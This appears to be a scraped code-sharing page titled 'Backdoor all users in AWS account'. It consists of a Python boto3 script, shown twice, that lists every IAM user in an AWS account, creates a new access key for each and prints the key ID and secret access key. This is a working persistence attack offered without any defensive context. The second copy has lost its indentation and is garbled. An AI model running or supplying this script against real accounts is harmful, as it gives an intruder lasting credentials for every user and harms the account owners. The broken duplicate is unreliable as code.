dagrz/Backdoor all users in AWS account

## Backdoor all users in AWS account
#!/usr/bin/env python
from __future__ import print_function
import boto3
from botocore.exceptions import ClientError
import json


def main(args):
    backdoor_users(get_users())


def get_users():
    client = boto3.client('iam')
    response = None
    user_names = []
    marker = None

    # By default, only 100 users are returned at a time.
    # 'Marker' is used for pagination.
    while (response is None or response['IsTruncated']):
        # Marker is only accepted if result was truncated.
        if marker is None:
            response = client.list_users()
        else:
            response = client.list_users(Marker=marker)

        users = response['Users']
        for user in users:
            user_names.append(user['UserName'])

        if response['IsTruncated']:
            marker = response['Marker']

    return user_names


def backdoor_users(user_names):
    for user_name in user_names:
        backdoor_user(user_name)


def backdoor_user(user_name):
    print(user_name)
    client = boto3.client('iam')
    try:
        response = client.create_access_key(UserName=user_name)
        print("  " + response['AccessKey']['AccessKeyId'])
        print("  " + response['AccessKey']['SecretAccessKey'])
    except ClientError as e:
        print("  " + e.response['Error']['Message'])


if __name__ == '__main__':
    args = None
    main(args)
	#!/usr/bin/env python
	from __future__ import print_function
	import boto3
	from botocore.exceptions import ClientError
	import json


	def main(args):
	backdoor_users(get_users())


	def get_users():
	client = boto3.client('iam')
	response = None
	user_names = []
	marker = None

	# By default, only 100 users are returned at a time.
	# 'Marker' is used for pagination.
	while (response is None or response['IsTruncated']):
	# Marker is only accepted if result was truncated.
	if marker is None:
	response = client.list_users()
	else:
	response = client.list_users(Marker=marker)

	users = response['Users']
	for user in users:
	user_names.append(user['UserName'])

	if response['IsTruncated']:
	marker = response['Marker']

	return user_names


	def backdoor_users(user_names):
	for user_name in user_names:
	backdoor_user(user_name)


	def backdoor_user(user_name):
	print(user_name)
	client = boto3.client('iam')
	try:
	response = client.create_access_key(UserName=user_name)
	print(" " + response['AccessKey']['AccessKeyId'])
	print(" " + response['AccessKey']['SecretAccessKey'])
	except ClientError as e:
	print(" " + e.response['Error']['Message'])


	if __name__ == '__main__':
	args = None
	main(args)